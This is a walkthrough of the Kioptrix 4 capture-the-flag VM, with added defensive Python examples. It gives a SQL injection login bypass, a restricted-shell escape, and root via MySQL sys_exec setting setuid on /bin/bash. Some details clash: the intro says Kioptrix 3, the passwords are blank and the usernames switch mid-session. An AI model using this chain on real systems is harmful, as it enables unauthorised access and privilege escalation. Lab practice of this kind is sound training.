To start this machine, create a new VMware Workstation virtual machine and then power it off. Next, copy the supplied .vmdk disk image into the Kioptrix 3 folder.
Once the machine has booted, run netdiscover to find its IP address. In this walkthrough the IP address obtained was 192.168.1.77.
Next, run an nmap service scan against the machine:
nmap -A -sV -p- 192.168.1.77
Nmap scan report for 192.168.1.77
Host is up (0.00059s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:EC:FC:75 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -5h00m00s, deviation: 2h49m42s, median: -7h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2019-07-13T06:55:04-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT      ADDRESS
1   0.59 ms  192.168.1.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.94 seconds
Let's browse to port 80 on the web server and see what we get back.
It looks like we can run DirBuster here to enumerate more directories.
Using DirBuster, we find two interesting usernames:
robert and john
http://192.168.1.77:80/robert/robert.php
http://192.168.1.77/john/john.php
We can now try a SQL injection login bypass using the payload:
' or 1=1 #
On the login page, enter:
username: robert
password: ' or 1=1 #
username: john
password: ' or 1=1 #
For each of the usernames we tried, the SQL injection payload bypasses the login.
For robert, the password we get back is:
For john, the password we get back is:
Now we can try to SSH into the host using the credentials we found:
ssh robert@192.168.1.77 with the password ADGAdsafdfwt4gadfga==
After logging in over SSH, we are dropped into a restricted shell.
Use echo os.system("/bin/bash") to escape the restricted shell.
root@kali:~# ssh robert@192.168.1.77
robert@192.168.1.77's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd clear echo exit help ll lpath ls
robert:~$ echo os.system("/bin/bash")
Now, we have an escaped shell.
robert@Kioptrix4:~$
Now let's check whether Kioptrix4 has SQL credentials stored in the web directory.
Let's cd (change directory) into /var/www:
robert@Kioptrix4:~$ cd /var/www/
Inside /var/www, checklogin.php holds the credentials for the MySQL database:
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
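To see why the ' or 1=1 payload works and what the fix looks like, here is an added example (not code from the original post or from the Kioptrix VM) that mirrors the logic of checklogin.php in Python against an in-memory SQLite table. The table schema, the two sample rows and their passwords are constructed for the demo; SQLite is used so the example runs stand-alone, and because SQLite comments start with -- rather than MySQL's #, the payload here ends in -- instead. The escape() helper stands in for mysql_real_escape_string and, exactly as in the PHP, is applied to the username only.

```python
import sqlite3

# Constructed stand-in for the box's `members` table: schema and rows are
# assumptions for the demo, not data taken from Kioptrix 4.
SAMPLE_MEMBERS = [
    ("john", "example-john-pass"),
    ("robert", "example-robert-pass"),
]


def make_db():
    """Create an in-memory members table and load the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return con


def escape(value):
    """Stand-in for mysql_real_escape_string(): neutralise the quote character so
    the value cannot close the string literal it is embedded in (SQLite doubles
    quotes; MySQL backslash-escapes them, the effect is the same)."""
    return value.replace("'", "''")


def checklogin_vulnerable(con, username, password):
    """Mirror checklogin.php: only the username is escaped, the password is
    concatenated into the SQL text exactly as the user typed it."""
    sql = ("SELECT * FROM members WHERE username='%s' and password='%s'"
           % (escape(username), password))
    return len(con.execute(sql).fetchall())   # the PHP logs in whenever count != 0


def checklogin_hardened(con, username, password):
    """Parameterised version: the driver binds the values, so quotes, 'or 1=1'
    and comment markers in either field can never change the query structure."""
    cur = con.execute(
        "SELECT * FROM members WHERE username=? and password=?",
        (username, password),
    )
    return len(cur.fetchall())


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"   # same idea as the post's ' or 1=1 #, with SQLite's comment marker
    print("vulnerable, payload in password:", checklogin_vulnerable(db, "robert", payload))  # 2: every row matches
    print("vulnerable, payload in username:", checklogin_vulnerable(db, payload, "x"))       # 0: escaping holds here
    print("hardened,   payload in password:", checklogin_hardened(db, "robert", payload))    # 0
```

The second call is the instructive one: the escaping that checklogin.php does apply works, so the username field is safe, but the commented-out line for the password leaves a second path into the same query. Escaping field by field is fragile in exactly this way; binding parameters removes the class of bug rather than one instance of it.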
Since the MySQL root account has no password, we can log in to it directly with:
mysql -u root
This is a seriously misconfigured root account.
Once we have a MySQL root session, run the following to set the setuid bit on /bin/bash, so that it runs with root's privileges:
SELECT sys_exec('chmod u+s /bin/bash');
sys_exec is not a built-in MySQL function but a user-defined function (from lib_mysqludf_sys) that is already loaded on this box, and the chmod only succeeds because mysqld itself is running as root.
mysql> SELECT sys_exec('chmod u+s /bin/bash');
+---------------------------------+
| sys_exec('chmod u+s /bin/bash') |
+---------------------------------+
| NULL |
+---------------------------------+
1 row in set (0.01 sec)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> quit
Bye
bash-3.2$ bash -p
Here's what bash -p means, from the bash manual:
If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from the environment, the SHELLOPTS variable, if it appears in the environment, is ignored, and the effective user id is set to the real user id. If the -p option is supplied at invocation, the startup behavior is the same, but the effective user id is not reset.
bash-3.2# whoami
root
bash-3.2# id
uid=1001(john) gid=1001(john) euid=0(root) groups=1001(john)
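chmod u+s /bin/bash is a persistence step as much as a privilege-escalation step: the setuid bit survives reboots, and bash -p keeps the effective uid, which is why the id output shows euid=0(root) while the uid stays 1001. The following added example (not part of the original post) is a small audit that lists setuid-root binaries missing from an expected baseline. It is run here over constructed directory entries so it executes offline; walk_filesystem() collects the same (path, mode, uid) tuples from a real host. The baseline set is an assumption for the demo and should be built from a known-good copy of the image in use.

```python
import os
import stat

# Setuid-root programs a stock Debian/Ubuntu install is expected to carry.
# This baseline is an assumption for the demo; build yours from a known-good image.
EXPECTED_SUID_ROOT = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

# Constructed directory entries (path, st_mode, st_uid) standing in for a scan of
# the box after `chmod u+s /bin/bash`; 0o104755 is a regular file, setuid, rwxr-xr-x.
SAMPLE_ENTRIES = [
    ("/bin/su",         0o104755, 0),     # expected setuid root
    ("/bin/bash",       0o104755, 0),     # setuid bit added by chmod u+s
    ("/bin/ls",         0o100755, 0),     # plain root-owned binary
    ("/home/john/tool", 0o104755, 1001),  # setuid, but owned by john, not root
]


def is_setuid_root(mode, uid):
    """True for a regular file owned by uid 0 with the setuid bit (what chmod u+s sets)."""
    return uid == 0 and stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def unexpected_setuid(entries, baseline=EXPECTED_SUID_ROOT):
    """Return the setuid-root paths that are not in the baseline, sorted."""
    return sorted(path for path, mode, uid in entries
                  if is_setuid_root(mode, uid) and path not in baseline)


def walk_filesystem(root="/", skip=("/proc", "/sys", "/dev", "/run")):
    """Yield (path, st_mode, st_uid) for every regular file under root, pruning
    virtual filesystems; lstat is used so symlinks are not followed."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # unreadable or vanished file: skip it
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode, st.st_uid


if __name__ == "__main__":
    print("unexpected setuid-root files:", unexpected_setuid(SAMPLE_ENTRIES))  # ['/bin/bash']
    # On a real host: print(unexpected_setuid(walk_filesystem()))
```

On a live system, find / -xdev -perm -4000 -user root -type f produces the same raw list; the value of the baseline comparison is turning that list into an alert on the one entry that should not be there, and the same check catches a setuid copy of bash dropped under any other path.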
bash-3.2# cd /root
bash-3.2# ls
congrats.txt lshell-0.9.12
bash-3.2# cat congrats.txt
Congratulations!
You've got root. And, popped a r00t shell.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
K33p F1ND1N6 0-days.